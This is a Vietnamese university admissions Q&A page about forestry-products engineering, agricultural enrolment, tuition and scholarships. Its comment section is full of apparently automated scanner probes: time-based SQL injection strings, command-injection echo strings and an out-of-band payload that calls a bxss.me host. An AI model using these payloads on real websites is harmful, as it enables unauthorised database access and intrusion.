Thí sinh hỏi – Nhà trường trả lời

Ngành Công nghệ chế biến lâm sản với đặc trưng chuyên môn gắn liền với lĩnh vực chế biến gỗ, ván nhân tạo, thiết kế các sản phẩm mộc nội, ngoại thất…Đây là ngành tỷ lệ 100% có việc làm với mức thu nhập ổn định trong đó 90% có việc làm đúng chuyên môn trong các lĩnh vực liên quan đến đồ gỗ.
Hiện nay, tình trạng thiếu trọng nguồn nhân lực ngành chế biến lâm sản vẫn đang tiếp tục diễn ra khi quy mô đào tạo 200 kỹ sư tốt nghiệp trên cả nước so với nhu cầu tuyển dụng hơn 30.000 kỹ sư đúng chuyên môn mỗi năm từ 2000 doanh nghiệp chế biến gỗ trên phạm vi cả nước. Khoa Lâm nghiệp, Trường Đại học Nông Lâm, Đại học Huế là cơ sở duy nhất đào tạo nguồn nhân lực ngành Công nghệ chế biến lâm sản đáp ứng nhu cầu cho toàn khu vực các tỉnh miền Trung và Tây Nguyên. Tuy nhiên, với số lượng tuyển sinh 30 tiêu chí mỗi năm, số sinh viên tốt nghiệp hoàn toàn không thể thỏa mãn được lượng tuyển dụng của các doanh nghiệp, xí nghiệp, công ty chế biến gỗ trên địa bàn.
Hợp tác đào tạo tay nghề với doanh nghiệp chế biến gỗ

Đào tạo nguồn nhân lực đáp ứng nhu cầu thị trường lao động là một trong những nhiệm vụ sứ mạng của trường Đại học Nông Lâm Huế. Trên tinh thân đó, ngành Công nghệ chế biến lâm sản luôn chú trọng cân bằng giữa việc trau dồi kiến thức chuyên môn trên giảng đường cũng như hoàn thiện những kỹ năng nghề nghiệp trong thực tiễn. Các học phần thực tế được thiết kế đóng vai trò như những khóa đào tạo ngắn hạn giúp sinh viên tiếp cận được được với công nghệ, dây chuyền sản xuất đồng thời tạo ra được cầu nối liên kết với các doanh nghiệp, công ty. Học đi đôi với hành. Khoảng thời gian trải nghiệm trở thành cơ hội quý báu giúp nếm trải, nắm bắt và xác định được những kiến thức, kỹ năng cần hoàn thiện, phát triển và tự hoạch định những kế hoạch nhằm phù hợp vị trí việc làm trong tương lai.

Cán bộ kỹ thuật hướng dẫn thao tác vận hành lò sấy

Đào tạo gắn liền với đặc thù nghề nghiệp và yêu cầu của thị trường luôn được xem là kim chỉ nan định hướng cho việc xây dựng chương trình đào tạo, nâng cao chất lượng học tập và giảng dạy của ngành Công nghệ chế biến lâm sản. Hướng đến sản phẩm đầu ra là một người kỹ sư hoàn thiện về chất và lượng, vừa cập nhật kịp thời, đáp ứng được các tiêu chuẩn ngày càng cao của thị trường tuyển dụng đặt ra.

Tham gia thao tác trên dây chuyền sản xuất
Tìm hiểu về cấu tạo của các máy chế biến gỗ
Tham gia kiểm định chất lượng sản phẩm trước khi xuất hàng
Kiểm tra chất lượng phôi gỗ nguyên liệu

Công nghệ chế biến lâm sản là ngành có tiềm năng về công việc lớn ở thị trường trong nước. Bên cạnh đó, quá trình hợp tác, phát triển đào tạo các sinh viên chế biến lâm sản có cơ hội trở thành các thực tập sinh trong lĩnh vực chế biến gỗ ở các nước có công nghệ phát triển: Nhật Bản, Đan Mạch bằng các chương trình hợp tác của trường. Đây là những lý do ngành Công nghệ chế biến lâm sản xứng đáng trở thành lựa chọn cho nghề nghiệp tương lai sau này.

  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    II18zZEs’) OR 190=(SELECT 190 FROM PG_SLEEP(15))–
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    wKq2PRa3′ OR 841=(SELECT 841 FROM PG_SLEEP(15))–
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    -1)) OR 57=(SELECT 57 FROM PG_SLEEP(15))–
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    -5 OR 239=(SELECT 239 FROM PG_SLEEP(15))–
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    v9KU05XJ’; waitfor delay ‘0:0:15’ —
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    -1); waitfor delay ‘0:0:15’ —
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    -1; waitfor delay ‘0:0:15’ —
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    vNQa2UAK
  • 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • yaEYk3uz')) OR 442=(SELECT 442 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • WQFzJrD0') OR 914=(SELECT 914 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • -5) OR 318=(SELECT 318 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • hkI8YhqA'; waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • -1); waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • -1; waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • if(now()=sysdate(),sleep(15),0) viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • Yl4eHFAs viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    http://bxss.me/t/fit.txt?.jpg
  • http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • xfs.bxss.me viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    &echo fhtfjo$()\ psylmf\nz^xyu||a #’ &echo fhtfjo$()\ psylmf\nz^xyu||a #|” &echo fhtfjo$()\ psylmf\nz^xyu||a #
  • &echo gxyjjb$()\ drkrdc\nz^xyu||a #' &echo gxyjjb$()\ drkrdc\nz^xyu||a #|" &echo gxyjjb$()\ drkrdc\nz^xyu||a # viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • response.write(9605408*9767385) viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • "+"A".concat(70-3).concat(22*4).concat(122).concat(89).concat(99).concat(88)+(require"socket" Socket.gethostbyname("hitgr"+"uklrxnag770f9.bxss.me.")[3].to_s)+" viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    TTH – Trên lý thuyết, ngành học có đầu ra kiếm được việc làm sẽ thu hút người học. Song, nghịch lý lại xảy ra với các ngành nông – lâm – ngư hiện nay.

    Nghịch lý

    Chỉ trong 3 tháng, có thể thấy rõ sự trái ngược của hai “bức tranh” tuyển dụng và tuyển sinh khối ngành nông – lâm – ngư tại Trường đại học (ĐH) Nông lâm, ĐH Huế. Trong khi ngày hội tuyển dụng (tháng 5/2018) cung không đủ cầu (sinh viên ra trường khoảng 1.500 nhưng nhu cầu các nhà tuyển dụng đăng ký 2.500) thì đợt tuyển sinh vừa qua (tháng 8/2018) nhà trường chỉ tuyển được hơn 50% người học so với chỉ tiêu (kể cả phương thức xét kết quả học bạ và thi THPT Quốc gia). Đáng nói là, các ngành “hot”, gần như 100% ra trường có việc làm ngay, như chăn nuôi, các ngành về thủy sản… đều không tuyển đạt số lượng mong muốn.

    Nghịch lý này không phải mới xuất hiện mà là tình trạng chung của các cơ sở đào tạo ngành nông – lâm – ngư cả nước những năm qua. Theo nhiều chuyên gia, nhận thức của phụ huynh và học sinh, nhất là các phụ huynh vùng nông thôn sống bằng nghề nông nghiệp, muốn con cái làm nghề khác là lý do chính. “Thường có khoảng 70% thí sinh vùng nông thôn, miền núi chọn học các ngành nông – lâm – ngư nhưng đối tượng này ngày càng giảm do suy nghĩ của thế hệ trẻ muốn thoát ly nông nghiệp vì hiểu chưa đúng đầu ra việc làm. Cũng có một số gia đình khó khăn cho con đi lao động để kiếm tiền thay vì bỏ thời gian và chi phí học ĐH. Những năm gần đây, lượng thí sinh đến từ một số địa phương khó khăn các tỉnh Thanh Hóa, Nghệ An, Hà Tĩnh vào trường giảm mạnh”, PGS. TS. Trần Thanh Đức, Phó Hiệu trưởng Trường ĐH Nông lâm, ĐH Huế nói.

    Sinh viên tìm hiểu cơ hội việc làm tại gian hàng doanh nghiệp trong ngày hội việc làm Trường ĐH Nông lâm năm 2018

    Lý do khác là thí sinh chọn ngành nghề theo trào lưu, trong khi việc tư vấn hướng nghiệp tại các trường phổ thông còn hạn chế do giáo viên không nắm rõ nhu cầu thị trường và chuẩn đầu ra việc làm của các ngành nghề. Khảo sát thí sinh mùa tuyển sinh 2018, không ít trường hợp thú thật lựa chọn ngành nghề theo bạn bè hay thông tin ngành “hot” trên mạng. “Ngành y, luật, báo chí là những ngành khá sang trọng nên em và bạn bè chọn. Hơn nữa, sống ở vùng nông thôn từ nhỏ, em muốn làm một nghề gì đó ở văn phòng sẽ thích hơn”, Trà My, tân sinh viên ĐH Huế, thành thật.

    Mặt khác, việc quảng bá các ngành học vẫn còn hạn chế. Các đợt tư vấn quảng bá tuyển sinh thường chỉ tập trung ở một vài điểm lớn, hình thức chưa hấp dẫn và thiếu hiệu quả. Thông tin sâu về các ngành học chưa được chuyển tải đầy đủ tới các thí sinh và phụ huynh.

    Nhiều giải pháp

    Theo quy hoạch phát triển nhân lực Việt Nam giai đoạn 2011 – 2020 của Thủ tướng Chính phủ (Quyết định 1216/QĐ-TTg ngày 22/7/2011) sẽ phát triển tỷ lệ nhân lực qua đào tạo khối ngành nông, lâm, ngư nghiệp tăng từ mức 15,5% năm 2010 lên khoảng 28 % năm 2015 và khoảng 50% năm 2020. Theo tính toán của các chuyên gia, đến năm 2020 nguồn nhân lực khối ngành này thiếu khoảng 3,2 triệu lao động qua đào tạo.

    Thời gian qua, Trường ĐH Nông lâm liên kết doanh nghiệp tốt, triển khai nhiều chương trình thực tập sinh ở nước ngoài. Đây là giải pháp căn cơ thúc đẩy thương hiệu ngành, đồng thời giải quyết bài toán đầu ra. Tuy nhiên, cần phải tận dụng hợp tác này để quảng bá tuyển sinh. Theo PGS. TS. Huỳnh Văn Chương, Phó Giám đốc ĐH Huế, hiện, ngày hội tuyển dụng và các sự kiện tuyển sinh vẫn diễn ra độc lập. Nếu có phương án tổ chức đồng thời hoặc mời đại diện các doanh nghiệp đồng hành quảng bá tuyển sinh sẽ hiệu quả và thuyết phục hơn. “Lâu nay, doanh nghiệp về trường giới thiệu cơ hội việc làm nhưng dành cho người đang học biết, còn người sắp học vẫn chưa có thông tin đầy đủ, nhất là thông tin thu nhập cao, các ngành công nghệ cao. Đó là điểm cần nghiên cứu”, ông Chương nói.

    Thay đổi giải pháp quảng bá tuyển sinh là vấn đề cần làm. Đơn vị đào tạo cần nắm bắt nhu cầu việc làm tại các địa phương để có tư vấn cụ thể. Bên cạnh đó, cần mở rộng khu vực tiếp cận thông tin tuyển sinh, nhất là các vùng nông thôn, miền núi vì đây là khu vực mà thông tin về đầu ra các ngành nghề còn hạn chế. Trường ĐH Nông lâm nói riêng, các cơ sở đào tạo nông lâm ngư nói chung cần hỗ trợ, phối hợp tốt với các trường phổ thông trong vấn đề hướng nghiệp cho học sinh. Ngoài ra, các trường cần có chương trình tôn vinh những cựu sinh viên thành đạt, giữ các vị trí cao tại các doanh nghiệp bằng minh chứng cụ thể.

    Về lâu dài, những trường đào tạo các ngành nông – lâm – ngư cần thảo luận hướng đi, chính sách để tham mưu cho bộ, ngành liên quan. “Hiện nay, sư phạm hay các ngành nghệ thuật có cơ chế đặc thù. Đối với các ngành nông lâm, nhu cầu xã hội cần nhưng thiếu người học cần những chính sách đặc thù của Nhà nước đầu tư, hỗ trợ cho một số ngành mang tính chiến lược”, ông Chương nói.

    Tại các trường, cần tái cấu trúc ngành nghề, tập trung vào một số ngành mũi nhọn và có thương hiệu, không đào tạo dàn trải. Ngoài ra, nên thay đổi mô hình đào tạo theo hình thức 50% giảng đường và 50% gắn với doanh nghiệp để mang lại cơ hội thực tập, việc làm và quảng bá ngành nghề. Trong tuyển sinh, cần có học bổng hay khuyến khích kịp thời cho những thí sinh đạt điểm cao như miễn giảm học phí để thu hút người học.

    Theo các chuyên gia, “đầu ra” việc làm ngành nông – lâm – ngư rất đa dạng, sinh viên ra trường có thể làm tại các viện nghiên cứu, trường ĐH, cao đẳng, các cơ quan quản lý Nhà nước liên quan đến nông lâm ngư nghiệp; các công ty thức ăn gia súc, thuốc thú y, công ty thực phẩm, công ty giống cây trồng vật nuôi, các tập đoàn – công ty lĩnh vực nuôi trồng thủy sản, các công ty chuyên khoa học đời sống, công ty phân bón, những trang trại, hợp tác xã nông nghiệp,… và cũng có thể tự khởi nghiệp.Ông Phạm Phú Phát, Phó Tổng Giám đốc Công ty Cổ phần Chăn nuôi C.P. Việt Nam cho biết, nhu cầu nhân lực ngành nông, lâm, ngư nghiệp hiện đang rất cần. Nếu sinh viên ra trường làm tốt công việc thì cơ hội thăng tiến cũng rất nhanh.

    Tác giả: Hữu Phúc

    Source: http://baothuathienhue.vn/nghich-ly-khoi-nganh-nong-lam-ngu-viec-nhieu-nguoi-hoc-it-a61456.html

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Để trở thành một kĩ sư nông nghiệp thì em phải học ngành gì? Bao nhiêu năm? Và ngành đó lấy điểm bao nhiêu
    Thí sinh hỏi : Để trở thành một kĩ sư nông nghiệp thì em phải học ngành gì? Bao nhiêu năm? Và ngành đó lấy điểm bao nhiêu. Năm sau là em thi rồi em rất muốn biết
    Được gửi từ email [email protected]
    Nhà trường trả lời : Để trở thành một kỹ sư nông nghiệp thì em có thể đăng ký theo học các ngành như: Khoa học cây trồng, Bảo vệ thực vật, Công nghệ rau hoa quả và cảnh quan, Nông học, Khoa học đất,…
    Các ngành này học 4 năm. Ngoài ra, Trường có đào tạo bậc Cao đẳng ngành Khoa học cây trồng: học 3 năm; sau khi học Cao đẳng em có thể học liên thông lên Đại học ngành Khoa học cây trồng
    Điểm chuẩn của các ngành này 3 năm qua em có thể xem theo link gửi kèm: http://localhost/index.php/vi/news/thong-tin- ho-tro- thi-sinh/diem-chuan-truong- dai-hoc- nong-lam- hue-trong- 3-nam- 2013-2014- 2015-80.html
    Em xem tên ngành và điểm chuẩn với khối xét tuyển tương ứng để được rõ. Có thông tin gì cần trao đổi thêm về công tác Tư vấn tuyển sinh – Hướng nghiệp của nhà trường thì em trao đổi (email hoặc điện thoại) với Ban TVTS-HN của nhà trường nhé
    Em có thể xem thêm các thông tin về TVTS-HN của nhà trường qua website: http://localhost/

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Thí sinh hỏi : cho em hỏi là với mức điểm hiện tại của em là 15 vậy có đủ để học ngành cơ khí được không?
    Được gửi từ email [email protected]
    Nhà trường trả lời : Điểm sàn để nộp vào trường là 15 điểm nên điểm của em là đủ điều kiện để nộp xét tuyển vào trường
    Ngành cơ khí cũng nhận hồ sơ xét tuyển là 15 điểm, em đủ để nộp hồ sơ vào ngành này nhé. Ngoài ra, trường có nhiều ngành năm 2015 lấy điểm chuẩn là 15 điểm nên em xem để nộp hồ sơ xét tuyển, chọn ngành để đăng ký với các nguyện vọng
    Em xem thêm các thông tin về tuyển sinh của trường tại website: tuyensinh.huaf.edu.vn để biết thêm chi tiết

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Thí sinh hỏi : Ngành kỹ thuật cơ điện tử thuộc khối nào? Điểm chuẩn ngành đó những năm trước là bao nhiêu?
    Được gửi từ email [email protected]
    Nhà trường trả lời : Em có thể tham khảo điểm chuẩn và khối xét tuyển ngành Kỹ thuật Cơ điện tử và 30 ngành/chuyên ngành khác của trường Đại học Nông Lâm Huế theo link
    https://tuyensinh.huaf.edu.vn/diem-trung-tuyen-2017-2018/
    Có gì chưa rõ thì em gửi email hoặc trao đổi với Ban TVTS của trường để được tư vấn rõ và đầy đủ hơn nhé

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Câu hỏi: Trường ĐHNL Huế có xét tuyển theo học bạ không ạ? Điều kiện để nộp hồ sơ xét tuyển là sao?
    Trả lời: Trường xét tuyển theo 2 hình thức trong đó có xét tuyển học bạ
    Điều kiện và thủ tục xét

    Sử dụng kết quả học tập các môn trong tổ hợp môn xét tuyển ở cấp THPT của năm học lớp 11 và học kỳ I năm học lớp 12 để xét tuyển. Điểm các môn trong tổ hợp môn xét tuyển là điểm trung bình chung (làm tròn đến 1 chữ số thập phân) mỗi môn học của năm học lớp 11 và học kỳ I năm học lớp 12. Điều kiện xét tuyển là tổng điểm các môn trong tổ hợp môn xét tuyển phải >=18.0

    Cách tính điểm trung bình môn

    Điều kiện xét: Tổng trung bình 3 môn lớn hơn hoặc bằng 18 điểm

    Thời gian đăng ký xét tuyển:

    Đợt 1 từ ngày 04/3/2019 đến 17g00 ngày 06/5/2019.
    Đợt 2 từ ngày 13/5/2019 đến 17g00 ngày 31/7/2019
    Xem danh sách trúng tuyển đợt 1 tại đây

    Hình thức nộp xét học bạ thpt

    Thí sinh có thể lựa chọn 1 trong 2 hình thức sau:
    1. Nộp hồ sơ xét tuyển Online tại đây http://dkxt.hueuni.edu.vn/
    2. Nộp Hồ sơ đăng ký xét tuyển sinh đại học bằng học bạ, gồm có:

    – Phiếu ĐKXT theo mẫu CLICK VÀO ĐÂY ĐỂ TẢI PHIỂU ĐIỀN THÔNG TIN
    – Lệ phí ĐKXT: 30.000đ/1 nguyện vọng;
    – Một phong bì đã dán sẵn tem, có ghi rõ họ tên, địa chỉ, số điện thoại liên lạc của thí sinh.
    – Địa điểm nộp hồ sơ: Thí sinh có thể nộp trực tiếp hoặc gửi chuyển phát nhanh qua đường Bưu điện theo địa chỉ theo 1 trong 2 địa chỉ sau:
    1. Ban Khảo thí & Đảm bảo chất lượng giáo dục, Đại học Huế, 01 Điện Biên Phủ, thành phố Huế, tỉnh Thừa Thiên Huế
    2. Trường Đại học Nông Lâm, Đại học Huế, 102 Phùng Hưng, thành phố Huế, tỉnh Thừa Thiên Huế

    Phiếu mẫu:

    Phong bì mẫu:

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Câu hỏi thường gặp: Học phí mỗi năm là bao nhiêu? Có nhiều học bổng không?
    Nhà trường trả lời:

    Học phí các ngành Nông Lâm Ngư nghiệp thuộc mức trung bình so với các ngành học còn lại. Học phí năm 2020 cho các ngành cụ thể như sau

    TT Mã ngành Tên ngành Học phí (1 năm)
    1 7620103 Khoa học đất 11,700,000
    2 7510201 Công nghệ kỹ thuật cơ khí 11,700,000
    3 7520114 Kỹ thuật cơ điện tử 11,700,000
    4 7540101 Công nghệ thực phẩm 11,700,000
    5 7540104 Công nghệ sau thu hoạch 11,700,000
    6 7549001 Công nghệ chế biến lâm sản 11,700,000
    7 7580210 Kỹ thuật cơ sở hạ tầng 11,700,000
    8 7520503 Kỹ thuật Trắc địa – Bản đồ 11,700,000
    9 7620102 Khuyến nông 9,800,000
    10 7620105 Chăn nuôi 9,800,000
    11 7620109 Nông học 9,800,000
    12 7620110 Khoa học cây trồng 9,800,000
    13 7620112 Bảo vệ thực vật 9,800,000
    14 7620113 Công nghệ rau hoa quả và cảnh quan 11,700,000
    15 7620116 Phát triển nông thôn 9,800,000
    16 7620201 Lâm học 9,800,000
    17 7620202 Lâm nghiệp đô thị 9,800,000
    18 7620211 Quản lí tài nguyên rừng 9,800,000
    19 7620301 Nuôi trồng thủy sản 9,800,000
    20 7620302 Bệnh học thủy sản 9,800,000
    21 7620305 Quản lý thủy sản 9,800,000
    22 7640101 Thú y 9,800,000
    23 7850103 Quản lí đất đai 11,700,000
    24 7340116 Bất động sản 11,700,000
    25 7540106 Đảm bảo chất lượng và an toàn thực phẩm 11,700,000
    26 7420203 Sinh học ứng dụng 11,700,000
    27 7620118 Nông nghiệp công nghệ cao 9,800,000
    28 7620119 Kinh doanh và Khởi nghiệp nông thôn 9,800,000
    Ngoài ra, để giúp sinh viên có thể ổn định, yên tâm trong học tập, nhà trường rất quan tâm đến việc duy trì và phát triển các nguồn học bổng. Hằng năm, sinh viên có cơ hội nhận các xuất học bổng với tổng giá trị quỹ học bổng 6 tỷ đồng/năm. Gồm các học bổng từ ngân sách như khuyến khích học tập, các học bổng tài trợ trong và ngoài nước, học bổng học tập ngắn hạn ngoài nước.

    Ngoài ra, nhà trường luôn tìm kiếm, hợp tác thêm với các tổ chức doanh nghiệp để trao các suất học bổng cho sinh viên có hoàn cảnh khó khăn, vượt khó học tốt. Trong đó, có nhiều học bổng theo suốt thời gian học tập, giúp sinh viên đảm bảo việc học tập, sinh hoạt, giảm chi phí cho gia đình.

    CÁC SUẤT HỌC BỔNG TRONG NĂM 2018

    TT TÊN HỌC BỔNG SỐ SUẤT GIÁ TRỊ THÀNH TIỀN ĐVT
    I. Ngoài ngân sách
    1 Viethope 31 300 9.300 USD
    2 Phuc’s Fond 6 6.700.000 40.200.000 VNĐ
    3 Hassen 3 216 648 USD
    4 Nguyễn Trường Tộ 23 200 4.600 USD
    5 Vallet 5 16.000.000 80.000.000 VNĐ
    6 Vừ A Dính 1 1.000.000 1.000.000 VNĐ
    7 Happel 37 30 1.110 Euro/Tháng
    8 VESAF 12 9 108.000.000 VNĐ
    9 Công ty Cargill 20 5 100.000.000 VNĐ
    10 Công ty Greenfeed 30 9 270.000.000 VNĐ
    11 Công ty Emivest 5 9 45.000.000 VNĐ
    12 Vietcombank TTH 10 2 20.000.000 VNĐ
    13 Keidanren (Nhật Bản) 5 300 1.500 USD
    14 Hội CSV CNTY khu vực phía Nam 30 5 150.000.000 VNĐ
    II. Khuyến khích học tập 800 3.500.000.000 VNĐ
    TỔNG 1018
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Câu hỏi thường gặp: Học Nông Lâm ra trường làm gì?

    Nhà trường trả lời:

    Nhà trường đã hợp tác chặt chẽ với hơn 100 doanh nghiệp trong đào tạo đáp ứng nhu cầu xã hội, tuyển dụng và xúc tiến cơ hội việc làm. Hằng năm, Nhà trường luôn tổ chức Ngày hội việc làm và có các văn phòng tuyển dụng trong suốt cả năm với quy mô trên 50 doanh nghiệp để tạo điều kiện sinh viên ra trường có việc làm ngay sau khi tốt nghiệp. Việc dạy và học cũng được nhà trường điều chỉnh theo hướng phát triển năng lực thích nghi công việc trong và ngoài nước, tự tạo việc làm và khởi nghiệp tốt.

    Tổng hợp kết quả tuyển dụng từ năm 2014 – 2017

    STT CÁC CHỈ TIÊU 2014 2015 2016 2017
    1 Doanh nghiệp tuyển dụng 25 33 52 52
    2 Chương trình CEO, Talk show 2 5 8 6
    3 Cơ hội việc làm, thực tập 800 1000 1500 1800
    4 Sinh viên tham gia tuyển dụng 1200 2100 2500 2600

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Câu hỏi thường gặp: Thực tập sinh nước ngoài có những lợi ích gì?

    Nhà trường trả lời:

    Việc liên kết với các đơn vị sử dụng lao động, các tổ chức doanh nghiệp để đưa sinh viên đi thực tập sinh tại nước ngoài cũng đã và đang được nhà trường xác định là chương trình hành động có tính chiến lược nhằm tạo thêm những cơ hội trải nghiệm, thực tập nghề nghiệp mới và đặc biệt là tạo ra môi trường rèn luyện, cải thiện và nâng cao trình độ ngoại ngữ cho sinh viên. Trong thời gian qua, nhà trường đã triển khai các chương trình liên kết như sau:
    Các chương trình thực tập sinh nước ngoài nổi bật
    TT ĐƠN VỊ SL ĐỊA ĐIỂM NỘI DUNG
    1 Hải Phong 200 Nhật Bản SV tốt nghiệp tất cả các ngành được đi làm việc và nhận mức lương 2000 USD/ tháng trong thời gian 1 và 3 năm.
    2 Nhật Huy Khang 300 Nhật Bản SV tốt nghiệp tất cả các ngành được đi làm việc và nhận mức lương 2000 USD/ tháng trong thời gian 3 năm và diện kỹ sư thì được định cư ở Nhật bản.
    3 Daystar 25 Nhật Bản SV tất cả các ngành được đi thực tập có lương 1 năm tại Nhật Bản, các nội dung thực tập của SV sẽ được nhà trường công nhận thay thế các môn học tại trường, sau này SV không học lại các môn học này. SV tham gia chương trình này sẽ thu được tài chính: 200 triệu đồng/1 SV
    4 Trung tâm OLECO – Bộ NN&PTNT 150 Israel SV tất cả các ngành được đi thực tập có lương 1 năm tại Israel về sản xuất nông nghiệp công nghệ cao, các nội dung thực tập của SV sẽ được nhà trường công nhận thay thế các môn học tại trường, sau này SV không học lại các môn học này. SV tham gia chương trình này sẽ thu được tài chính: 100-150 triệu đồng/1 SV
    5 Trung tâm Landbruget Jobservice ApS 30 Đan Mạch SV tất cả các ngành được đi thực tập có lương 1 năm về sản xuất nông nghiệp công nghệ cao, các nội dung thực tập của SV sẽ được nhà trường công nhận thay thế các môn học tại trường, sau này SV không học lại các môn học này. Các SV có thể sau này quay trở lại làm việc và định cư tại Đan Mạch nếu thực tập tốt. SV tham gia chương trình này sẽ thu được tài chính: 200-300 triệu đồng/1 SV.
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    ‘”
  • 1 viết:
